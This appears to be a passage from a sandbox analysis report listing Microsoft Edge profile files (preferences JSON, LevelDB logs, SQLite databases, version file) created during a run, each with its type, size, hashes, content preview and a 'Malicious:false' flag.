                                                                                                                                                                                                                                                                                      SHA-512:F690D82A8A326D0E2398679AFEEBDD9BA6E9B55A1A4E2D770015B9B417CE4D76E92D064A6DA0B31ED9C042C5911F07D3E304605FAE3AD19144B6A98A87AD7748
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379760322732592","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340965831357520","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1,"datatype_details_migration_performed":true},"co

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\ad9a331a-07d1-45be-a73b-6dbdef662516.tmp

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):25012
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.566941256586088
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:768:XQRbVbWP4afHe8F1+UoAYDCx9Tuqh0VfUC9xbog/OVyvhkSrwHpKtuCX:XQRbVbWP4afHeu1jafJkX8td
                                                                                                                                                                                                                                                                                      MD5:946A5A87E6740BEE007FD0C171107444
                                                                                                                                                                                                                                                                                      SHA1:66765AD1C24D8A94C3A8E5E60AEBF8134B387370
                                                                                                                                                                                                                                                                                      SHA-256:22380EF05AA67C241F3770C2A5B322AFD4CFCBF467E690FA7F660F57BC63FC20
                                                                                                                                                                                                                                                                                      SHA-512:F50D7474842F500ED4135B8A0B433A30AE05D7E4D8AED19ADCB4F16088E76428DD8E81B77AA865E393386C21E3902B73B4DCCDBE8A509C4C8ED79838BC0058F4
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13379760322200595","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13379760322200595","location":5,"ma

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\arbitration_service_config.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (3951), with CRLF line terminators
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):11755
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.190465908239046
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:192:hH4vrmqRBB4W4PoiUDNaxvR5FCHFcoaSbqGEDI:hH4vrmUB6W4jR3GaSbqGEDI
                                                                                                                                                                                                                                                                                      MD5:07301A857C41B5854E6F84CA00B81EA0
                                                                                                                                                                                                                                                                                      SHA1:7441FC1018508FF4F3DBAA139A21634C08ED979C
                                                                                                                                                                                                                                                                                      SHA-256:2343C541E095E1D5F202E8D2A0807113E69E1969AF8E15E3644C51DB0BF33FBF
                                                                                                                                                                                                                                                                                      SHA-512:00ADE38E9D2F07C64648202F1D5F18A2DFB2781C0517EAEBCD567D8A77DBB7CB40A58B7C7D4EC03336A63A20D2E11DD64448F020C6FF72F06CA870AA2B4765E0
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{.. "DefaultCohort": {.. "21f3388b-c2a5-4791-8f6e-a4cad6d17f4f.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.BingHomePage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Covid.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Finance.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Jobs.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.KnowledgeCard.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Local.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NTP3PCLICK.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NotifySearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Recipe.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.SearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Sports.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Travel.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Weather.Bubble": 1,.. "2cb2db96-3bd0-403e-abe2-9269b3761041.Bubble": 1,.

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\bec69efc-7258-49db-8355-5d7f8d9f40d9.tmp

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1
                                                                                                                                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                      MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                      SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                      SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                      SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:.

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\databases\Databases.db

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x4, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):28672
                                                                                                                                                                                                                                                                                      Entropy (8bit):0.3410017321959524
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:12:TLiqi/nGb0EiDFIlTSFbyrKZb9YwFOqAyl+FxOUwa5qgufTJpbZ75fOSG:TLiMNiD+lZk/Fj+6UwccNp15fBG
                                                                                                                                                                                                                                                                                      MD5:98643AF1CA5C0FE03CE8C687189CE56B
                                                                                                                                                                                                                                                                                      SHA1:ECADBA79A364D72354C658FD6EA3D5CF938F686B
                                                                                                                                                                                                                                                                                      SHA-256:4DC3BF7A36AB5DA80C0995FAF61ED0F96C4DE572F2D6FF9F120F9BC44B69E444
                                                                                                                                                                                                                                                                                      SHA-512:68B69FCE8EF5AB1DDA2994BA4DB111136BD441BC3EFC0251F57DC20A3095B8420669E646E2347EAB7BAF30CACA4BCF74BD88E049378D8DE57DE72E4B8A5FF74B
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g.....P....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\eb445a4a-f5b4-4028-8c5d-37ce5a3b30cf.tmp

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:Unicode text, UTF-8 text, with very long lines (17316), with no line terminators
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):17318
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.489331163855717
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:192:stnJ99QTryDiuabatSuyp8BsIYyaNPOpegzkXMlNsNXphzd8J2w513o8VmbV+FpM:stnPGQSu48BsIYtJOpnizdgtebG6Qwz
                                                                                                                                                                                                                                                                                      MD5:964E5BE44AE1E9E3CA6916A8E5F0E39E
                                                                                                                                                                                                                                                                                      SHA1:D7A0BAF4BC05A33AC4D5190620888A2D14140082
                                                                                                                                                                                                                                                                                      SHA-256:9DADE4F4643B49DC979A5B6CCE1A83EFBEBE07E320A53E0BE9431A20D86EF5DA
                                                                                                                                                                                                                                                                                      SHA-512:F0B97BB4AE6539B8D8F7DE1253EAE3ABBAE1A589AEF029607C758B9B31156CF998E064222354A6AE3516C5862F0C31442F5D88B0C37DAE2A60DAD5BAE9FD8C89
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379760322732592","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340965831357520","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-shm

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):32768
                                                                                                                                                                                                                                                                                      Entropy (8bit):0.10286360432781526
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:12:+rvY3rxspEjVl/PnnnnnnnnnnnvoQ/Eou:+rvY3rSoPnnnnnnnnnnnv1j
                                                                                                                                                                                                                                                                                      MD5:CF5445FE827FD256EEA7CC3BAF2E58D0
                                                                                                                                                                                                                                                                                      SHA1:F60D8F96000DE3D7612A93DE98E2FDB0B6D6ED58
                                                                                                                                                                                                                                                                                      SHA-256:46AB81BD1D30F78BFA5257089C97A61A62AF6AF0BCA76016D94E6F97A22EF8CB
                                                                                                                                                                                                                                                                                      SHA-512:EB33E362EFE06B8F16090A216E5194F76631003CE2C530DC3210670B9E845C55FE3AE47BF3167607A953D0DFC7136C3D949950E1235B3AA44E019E9FA1A57D78
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:..-.............M.......v...3c&O3.-.......}..~....-.............M.......v...3c&O3.-.......}..~..........I...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-wal

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:SQLite Write-Ahead Log, version 3007000
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):317272
                                                                                                                                                                                                                                                                                      Entropy (8bit):0.8898233624595906
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:384:LYo3K7PbUPUz8Nbg888JbqEW88mb3yjWZ8LbpOWW80bfvWy8Tb+/Wa1m8wb6v8e6:gIZrptmjghXUei2fS
                                                                                                                                                                                                                                                                                      MD5:F53F74DAF9A890C63682A1286E857141
                                                                                                                                                                                                                                                                                      SHA1:B8F3070AE40B60D6F6C5459ED407BFEC45BEF7D6
                                                                                                                                                                                                                                                                                      SHA-256:4991F726ECEAFB676B829A1296C3CAE3766E25A151D2432800B88F1664AE231D
                                                                                                                                                                                                                                                                                      SHA-512:C14C56889A8A8A9AC2E3708E480136577BCBEFF79474CAE8B3480DA9FB66C51F52FDE7288209A71397C096FD243E8392D7FD08602AA2482686C099E56BD205DE
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:7....-..........3.-.......F`..........3.-......+..O.\SQLite format 3......@ ..........................................................................j.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\000003.log

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):485
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.015073569894885
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:6:/XntM+dl3sedhOmOuuuuuuuuuuuvillfl/YOsedhOM:llc8BOuuuuuuuuuuuKllfRYD8h
                                                                                                                                                                                                                                                                                      MD5:657C206C35F2FEF33991AB2F23474D6A
                                                                                                                                                                                                                                                                                      SHA1:DCD8C47DDCC1988A8787159A11D13676368EEF33
                                                                                                                                                                                                                                                                                      SHA-256:6535B17331B935CA4AFBB272B34B653E00A491A04040D0F567B94807131EAC62
                                                                                                                                                                                                                                                                                      SHA-512:5C22582A0704CF66C45797E809CF94BF2903ACB44B0DE0B689C2914E66D6A494405682B40EA65B8851CBF4098197E7C1C6829AC4C5F4FC07506E8D264CDE0751
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:A..r.................20_1_1...1.,U.................20_1_1...1...0................39_config..........6.....n ...1u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...................;...............#38_h.......6.Z..W.F.....~.......~............V.e..................>0................39_config..........6.....n ..1

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):330
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.240012600058439
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:6:Dyf4Iyq2PcNwi23oH+TcwtfrK+IFUt8Wyf6Fz1Zmw+Wyf6FlRkwOcNwi23oH+Tcq:oyvLZYeb23FUt8EFZ/+EFlR54ZYeb3J
                                                                                                                                                                                                                                                                                      MD5:0333D6ED5645720B61081630BF639C4F
                                                                                                                                                                                                                                                                                      SHA1:DD91DA46DB326B55CB66998096896CD21362BB2D
                                                                                                                                                                                                                                                                                      SHA-256:7C04C7E5FA1DDE20D186B15378725174D3E7907F6D42A5D6B8F078FEE51BC4B0
                                                                                                                                                                                                                                                                                      SHA-512:FACB39AA698A55E522ACD65D590E4A863AFC5CB59349734376D4848FC5BE8731778E6F084288B2A602C7B94426BF33581F47D95709D8FC5EA21966083104DA90
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:2024/12/27-03:05:22.816 13c4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2024/12/27-03:05:22.817 13c4 Recovering log #3.2024/12/27-03:05:22.817 13c4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG.old (copy)

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):330
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.240012600058439
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:6:Dyf4Iyq2PcNwi23oH+TcwtfrK+IFUt8Wyf6Fz1Zmw+Wyf6FlRkwOcNwi23oH+Tcq:oyvLZYeb23FUt8EFZ/+EFlR54ZYeb3J
                                                                                                                                                                                                                                                                                      MD5:0333D6ED5645720B61081630BF639C4F
                                                                                                                                                                                                                                                                                      SHA1:DD91DA46DB326B55CB66998096896CD21362BB2D
                                                                                                                                                                                                                                                                                      SHA-256:7C04C7E5FA1DDE20D186B15378725174D3E7907F6D42A5D6B8F078FEE51BC4B0
                                                                                                                                                                                                                                                                                      SHA-512:FACB39AA698A55E522ACD65D590E4A863AFC5CB59349734376D4848FC5BE8731778E6F084288B2A602C7B94426BF33581F47D95709D8FC5EA21966083104DA90
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:2024/12/27-03:05:22.816 13c4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2024/12/27-03:05:22.817 13c4 Recovering log #3.2024/12/27-03:05:22.817 13c4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\000003.log

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):782
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.049291162962452
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:12:G0nYUtTNop//z32m5t/yVf9HqlIZfkBA//DtKhKg+rOyBrgxvB1ys:G0nYUtypD32m3yWlIZMBA5NgKIvB8s
                                                                                                                                                                                                                                                                                      MD5:FDF465758A7489458B387EB41C7D42B0
                                                                                                                                                                                                                                                                                      SHA1:9509283CF1BD7397790091C5A7580CBA353A1143
                                                                                                                                                                                                                                                                                      SHA-256:C5A7592A847D101DCB71AEE0A234835548121C647E6D99EF794337823A347703
                                                                                                                                                                                                                                                                                      SHA-512:9E40B768990B3FAC6960274C5C78F9B86585100DBFE92BC885FC5384937F2922C3ED435B44C42DEAC138E8FB22CD1EED865DBB984CFFDAE8ED0BE96EDADA1698
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:.h.6.................__global... .t...................__global... .9..b.................33_..........................33_........v.................21_.....vuNX.................21_.....<...................20_.....X...................20_.....W.J+.................19_......qY.................18_.....'}2..................37_.......c..................38_......i...................39_.....Owa..................20_.....4.9..................20_.....B.I..................19_..........................18_.....2.1..................37_..........................38_......=.%.................39_.....p.j..................9_.....JJ...................9_.....|.&R.................__global... ./....................__global... ..T...................__global... ...G..................__global... .

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):348
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.207523963123791
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:6:Dyf64pyq2PcNwi23oH+TcwtfrzAdIFUt8Wyf64/1Zmw+Wyf64pRkwOcNwi23oH++:FIyvLZYeb9FUt8cI/+cIR54ZYeb2J
                                                                                                                                                                                                                                                                                      MD5:17E79D6FDED32CF50209132E08340571
                                                                                                                                                                                                                                                                                      SHA1:5C2EC57AB58C6926CE1E7A049709CA38CEFCF936
                                                                                                                                                                                                                                                                                      SHA-256:DA410AE85B27B88FD0B1FC0422EB7565FE2CBAD359C4C4A526D3F4B08BE13B2D
                                                                                                                                                                                                                                                                                      SHA-512:7574F83DD2D1455F6AD750F8F608464852A22792CFDDCCF249CF5B31FF21AD5B422B09A8D359429585276FC59FB850B93BEE1C4D9DBA61FCC74732E604D61F90
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:2024/12/27-03:05:22.814 13c4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2024/12/27-03:05:22.814 13c4 Recovering log #3.2024/12/27-03:05:22.814 13c4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG.old (copy)

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):348
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.207523963123791
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:6:Dyf64pyq2PcNwi23oH+TcwtfrzAdIFUt8Wyf64/1Zmw+Wyf64pRkwOcNwi23oH++:FIyvLZYeb9FUt8cI/+cIR54ZYeb2J
                                                                                                                                                                                                                                                                                      MD5:17E79D6FDED32CF50209132E08340571
                                                                                                                                                                                                                                                                                      SHA1:5C2EC57AB58C6926CE1E7A049709CA38CEFCF936
                                                                                                                                                                                                                                                                                      SHA-256:DA410AE85B27B88FD0B1FC0422EB7565FE2CBAD359C4C4A526D3F4B08BE13B2D
                                                                                                                                                                                                                                                                                      SHA-512:7574F83DD2D1455F6AD750F8F608464852A22792CFDDCCF249CF5B31FF21AD5B422B09A8D359429585276FC59FB850B93BEE1C4D9DBA61FCC74732E604D61F90
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:2024/12/27-03:05:22.814 13c4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2024/12/27-03:05:22.814 13c4 Recovering log #3.2024/12/27-03:05:22.814 13c4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Browser

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):120
                                                                                                                                                                                                                                                                                      Entropy (8bit):3.32524464792714
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:tbloIlrJFlXnpQoWcNylRjlgbYnPdJiG6R7lZAUAl:tbdlrYoWcV0n1IGi7kBl
                                                                                                                                                                                                                                                                                      MD5:A397E5983D4A1619E36143B4D804B870
                                                                                                                                                                                                                                                                                      SHA1:AA135A8CC2469CFD1EF2D7955F027D95BE5DFBD4
                                                                                                                                                                                                                                                                                      SHA-256:9C70F766D3B84FC2BB298EFA37CC9191F28BEC336329CC11468CFADBC3B137F4
                                                                                                                                                                                                                                                                                      SHA-512:4159EA654152D2810C95648694DD71957C84EA825FCCA87B36F7E3282A72B30EF741805C610C5FA847CA186E34BDE9C289AAA7B6931C5B257F1D11255CD2A816
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Version

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):13
                                                                                                                                                                                                                                                                                      Entropy (8bit):2.7192945256669794
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:NYLFRQI:ap2I
                                                                                                                                                                                                                                                                                      MD5:BF16C04B916ACE92DB941EBB1AF3CB18
                                                                                                                                                                                                                                                                                      SHA1:FA8DAEAE881F91F61EE0EE21BE5156255429AA8A
                                                                                                                                                                                                                                                                                      SHA-256:7FC23C9028A316EC0AC25B09B5B0D61A1D21E58DFCF84C2A5F5B529129729098
                                                                                                                                                                                                                                                                                      SHA-512:F0B7DF5517596B38D57C57B5777E008D6229AB5B1841BBE74602C77EEA2252BF644B8650C7642BD466213F62E15CC7AB5A95B28E26D3907260ED1B96A74B65FB
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:117.0.2045.47

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State (copy)

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):56066
                                                                                                                                                                                                                                                                                      Entropy (8bit):6.103048214506423
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:1536:z/Ps+wsI7ynPPGWv/sxtwN7VLyMV/YoskFoz:z/0+zI7ynPv/4K9VeZoskG
                                                                                                                                                                                                                                                                                      MD5:FA0A1C7DF7FC7A605074E3D85A9FA92D
                                                                                                                                                                                                                                                                                      SHA1:687A003AACB6E16792FECBCFD6EAF3627BD2282A
                                                                                                                                                                                                                                                                                      SHA-256:6A908D7959F04E53B535AA3FEAF201952BDD83983A8DED335983FB53F91EF65E
                                                                                                                                                                                                                                                                                      SHA-512:08B1F7089DD480A3E7547AF811618B7D4F53BA04100DB4301AB16CB0DFF803F1A4C068ED23BA2BE84CDD0EE641EFB05C39DE55023DD4B70F6DB4DEA00FE390A9
                                                                                                                                                                                                                                                                                      Malicious:false
